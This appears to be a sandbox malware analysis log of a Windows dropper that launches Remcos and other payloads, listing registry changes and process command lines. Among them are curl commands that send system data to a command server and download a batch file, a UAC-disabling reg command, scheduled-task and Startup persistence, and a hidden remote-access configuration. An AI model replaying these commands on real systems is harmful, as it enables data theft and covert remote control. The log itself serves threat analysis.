| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\System32\dllhost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | C:\Windows\System32\dllhost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host | C:\Windows\SysWOW64\regedit.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\TektonIT\Remote Manipulator System\Host\Parameters\General = efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223730313230223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e5275737369616e3c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3661766a766755477a614d3d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e66616c73653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e66616c73653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e66616c73653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c6c6f675f7573655f77696e646f77733e66616c73653c2f6c6f675f7573655f77696e646f77733e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e5167413341444141526741774145494152414247414559414f41417a414445414e674242414545414e41417a41454d4152414132414551414f514131414559415251424341446b414e674179414545414f414134414430414e414130414451414e414130414334414e414178414451414e41417a414449414f414133414441414e41413d3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343538362e363131393838353138353c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349334d4445794d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e66616c73653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c636c6970626f6172645f7472616e736665725f6d6f64653e303c2f636c6970626f6172645f7472616e736665725f6d6f64653e3c636c6f73655f73657373696f6e5f69646c653e66616c73653c2f636c6f73655f73657373696f6e5f69646c653e3c636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e36303c2f636c6f73655f73657373696f6e5f69646c655f696e74657276616c3e3c73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e66616c73653c2f73686f775f636f6e6e656374696f6e5f616c6572745f666f725f616c6c3e3c2f67656e6572616c5f73657474696e67733e0d0a | C:\Windows\SysWOW64\regedit.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\a\RMX.exe | N/A |
Modifies registry key
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
Runs .reg file with regedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\regedit.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\ProgramData\Remcos\remcos.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe | N/A |
| N/A | N/A | C:\Windows\explorer.exe | N/A |
| N/A | N/A | C:\Windows\System32\dllhost.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
| N/A | N/A | C:\Windows\System32\Conhost.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\system32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe
"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Local\Temp\a\random.exe
"C:\Users\Admin\AppData\Local\Temp\a\random.exe"
C:\Users\Admin\AppData\Local\Temp\a\client.exe
"C:\Users\Admin\AppData\Local\Temp\a\client.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\mode.com
mode 65,10
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
"C:\Users\Admin\AppData\Local\Temp\a\l4.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\onefile_2276_133785010355926678\l4.exe
C:\Users\Admin\AppData\Local\Temp\a\l4.exe
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe
"C:\Users\Admin\AppData\Local\Temp\a\W4KLQf7.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe
"C:\Users\Admin\AppData\Local\Temp\a\AzVRM7c.exe"
C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe
"C:\Users\Admin\AppData\Local\Temp\a\Z9Pp9pM.exe"
C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe
"C:\Users\Admin\AppData\Local\Temp\a\C1J7SVw.exe"
C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe
"C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe"
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe
"C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe"
C:\Windows\SysWOW64\cmd.exe
cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"
C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe
"C:\Users\Admin\AppData\Local\Temp\a\networkmanager.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\systeminfo.exe
systeminfo
C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe
"C:\Users\Admin\AppData\Local\Temp\a\9feskIx.exe"
C:\Windows\system32\mode.com
mode 65,10
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe
C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe -Embedding
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\a\3EUEYgl.exe" & rd /s /q "C:\ProgramData\IE3E3OPZUA1N" & exit
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e file.zip -p24291711423417250691697322505 -oextracted
C:\Windows\SysWOW64\timeout.exe
timeout /t 10
C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe
"C:\Users\Admin\AppData\Local\Temp\a\4XYFk9r.exe"
C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe
"C:\Users\Admin\AppData\Local\Temp\a\dwVrTdy.exe"
C:\Users\Admin\AppData\Local\Temp\a\RMX.exe
"C:\Users\Admin\AppData\Local\Temp\a\RMX.exe"
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_7.zip -oextracted
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\install.vbs"
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_6.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_5.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_4.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_3.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_2.zip -oextracted
C:\Users\Admin\AppData\Local\Temp\main\7z.exe
7z.exe e extracted/file_1.zip -oextracted
C:\Windows\system32\attrib.exe
attrib +H "in.exe"
C:\Users\Admin\AppData\Local\Temp\main\in.exe
"in.exe"
C:\Windows\SYSTEM32\attrib.exe
attrib +H +S C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\attrib.exe
attrib +H C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe
C:\Windows\SYSTEM32\schtasks.exe
schtasks /f /CREATE /TN "Intel_PTT_EK_Recertification" /TR "C:\Users\Admin\AppData\Roaming\Intel_PTT_EK_Recertification.exe" /SC MINUTE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell ping 127.0.0.1; del in.exe
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c "C:\ProgramData\Remcos\remcos.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe
"C:\Users\Admin\AppData\Local\Temp\a\yiklfON.exe"
C:\ProgramData\Remcos\remcos.exe
C:\ProgramData\Remcos\remcos.exe
C:\Windows\SysWOW64\cmd.exe
/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\reg.exe
C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
C:\Windows\system32\PING.EXE
"C:\Windows\system32\PING.EXE" 127.0.0.1
C:\Windows\SysWOW64\tasklist.exe
tasklist
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F474C5A43534E4C4B2F41646D696E2F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F474C5A43534E4C4B2F41646D696E2F32" -H "X-Sec-Id: 3" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c type "C:\Users\Admin\AppData\Local\Temp\a\M5iFR20.exe" > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\M5iFR20.exe"
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -H "X-Auth: 2F474C5A43534E4C4B2F41646D696E2F32" -Lo "C:\Users\Admin\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\tmp.bat" > C:\Users\Admin\AppData\Local\Temp\tmp.txt
C:\Windows\SysWOW64\curl.exe
curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C41646D696E5C417070446174615C4C6F63616C5C54656D705C615C4D3569465232302E657865" -X POST -H "X-Auth: 2F474C5A43534E4C4B2F41646D696E2F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\Admin\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\tmp535B.tmp.bat & Del C:\Users\Admin\AppData\Local\Temp\tmp535B.tmp.bat
C:\Program Files\Windows Media Player\graph\graph.exe
"C:\Program Files\Windows Media Player\graph\graph.exe"
C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe
"C:\Users\Admin\AppData\Local\Temp\a\chrome11.exe"
C:\Windows\System32\certutil.exe
"C:\Windows\System32\certutil.exe" -silent -importPFX -p "" -f "C:\Users\Admin\AppData\Local\Temp\tmp5EE6.tmp"
C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe
"C:\Users\Admin\AppData\Local\Temp\a\Dynpvoy.exe"
C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe
"C:\Users\Admin\AppData\Local\Temp\7725ce688f\Gxtuum.exe"
